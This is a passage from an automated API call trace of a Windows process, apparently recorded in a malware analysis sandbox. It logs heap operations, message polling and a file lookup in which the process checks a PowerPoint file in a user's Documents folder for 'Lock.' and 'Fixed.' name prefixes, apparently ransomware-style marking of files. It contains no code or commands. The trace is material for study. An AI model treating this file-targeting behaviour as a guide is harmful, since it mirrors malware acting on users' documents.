hHeap=0x25c0000) returned 1 [0259.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0259.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0259.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0259.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0259.968] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0259.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0259.968] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0259.968] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0259.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0259.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0259.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0259.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0259.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0259.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0259.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0259.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0259.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0259.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0259.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0259.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0259.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0259.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2tDiT2As-QJTabaRcc L.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tDiT2As-QJTabaRcc L.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DiT2As-QJTabaRcc L.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iT2As-QJTabaRcc L.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T2As-QJTabaRcc L.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2As-QJTabaRcc L.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="As-QJTabaRcc L.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s-QJTabaRcc L.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-QJTabaRcc L.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QJTabaRcc L.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JTabaRcc L.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TabaRcc L.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="abaRcc L.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="baRcc L.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aRcc L.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rcc L.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cc L.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c L.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" L.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0259.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0259.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0259.970] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0259.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0259.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0259.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0259.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0259.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0259.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2tDiT2As-QJTabaRcc L.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tDiT2As-QJTabaRcc L.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DiT2As-QJTabaRcc L.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iT2As-QJTabaRcc L.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T2As-QJTabaRcc L.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2As-QJTabaRcc L.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="As-QJTabaRcc L.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s-QJTabaRcc L.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-QJTabaRcc L.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QJTabaRcc L.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JTabaRcc L.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TabaRcc L.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="abaRcc L.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="baRcc L.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aRcc L.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rcc L.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cc L.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c L.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" L.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.971] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0259.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0259.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0259.971] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0259.971] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0259.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0259.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0259.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9dc8 [0259.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0259.972] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0259.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0259.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0259.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0259.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0259.972] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0259.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0259.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0259.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0259.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0259.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0259.972] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0259.972] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.972] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0259.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0259.972] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0259.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0259.973] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0259.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0259.973] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0259.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0259.973] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/2tDiT2As-QJTabaRcc L.pptx", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaaf4150, ftCreationTime.dwHighDateTime=0x1d4f3a8, ftLastAccessTime.dwLowDateTime=0xbddeed30, ftLastAccessTime.dwHighDateTime=0x1d4f4f7, ftLastWriteTime.dwLowDateTime=0xbddeed30, ftLastWriteTime.dwHighDateTime=0x1d4f4f7, nFileSizeHigh=0x0, nFileSizeLow=0xbb35, dwReserved0=0x9d40047, dwReserved1=0x210b4, cFileName="2tDiT2As-QJTabaRcc L.pptx", cAlternateFileName="2TDIT2~1.PPT")) returned 0xaa5860 [0259.973] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0259.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0259.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0259.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0259.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0259.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0259.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0259.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0259.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0259.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0259.974] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0259.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0259.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0259.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0259.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0259.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0259.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0259.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0259.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0259.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0259.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0259.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0259.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0259.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0259.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0259.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0259.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0259.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0259.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0259.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0259.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0259.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0259.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0259.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0259.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0259.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0259.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0259.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0259.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0259.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0259.976] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0259.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0259.976] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0259.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0259.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0259.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c48 [0259.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0259.976] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0259.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0259.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0259.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0259.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0259.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0259.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0259.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0259.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0259.977] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0259.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0259.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0259.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0259.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0259.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0259.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0259.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0259.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0259.977] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0259.977] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0259.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0259.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0259.977] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0259.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0259.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0259.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aaec0 [0259.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0259.978] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0259.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0259.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0259.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0259.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0259.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0259.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0259.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0259.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0259.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0259.978] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0259.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0259.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0259.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0259.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0259.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0259.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0259.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0259.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0259.979] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0259.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0259.979] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0259.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0259.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0259.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0259.979] 